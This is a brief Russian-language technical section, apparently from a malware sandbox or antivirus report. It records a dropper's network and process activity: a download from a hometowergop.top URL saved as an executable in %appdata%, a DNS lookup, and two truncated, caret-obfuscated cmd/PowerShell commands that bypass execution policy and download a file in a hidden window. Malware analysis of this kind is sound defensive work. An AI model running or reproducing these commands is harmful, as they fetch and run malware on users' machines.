Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^eRShe^lL.^exe ^-eXECuTiONp^OlIC^Y bYpaS^S^ -^NoPrOfi^L^e^ -wInD^owST^yl^e HIDdEN^ ^(NE^w-obJecT syS^tEM.n^ET.w^Eb^C^LIE^Nt)^.d^owNLOA^d^FILe(^'http://hometowergop.top/rea...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "p^oW^eRShe^lL.^exe ^-eXECuTiONp^OlIC^Y bYpaS^S^ -^NoPrOfi^L^e^ -wInD^owST^yl^e HIDdEN^ ^(NE^w-obJecT syS^tEM.n^ET.w^Eb^C^LIE^Nt)^.d^owNLOA^d^FILe(^'http://hometowergop.top/rea...' (со скрытым окном)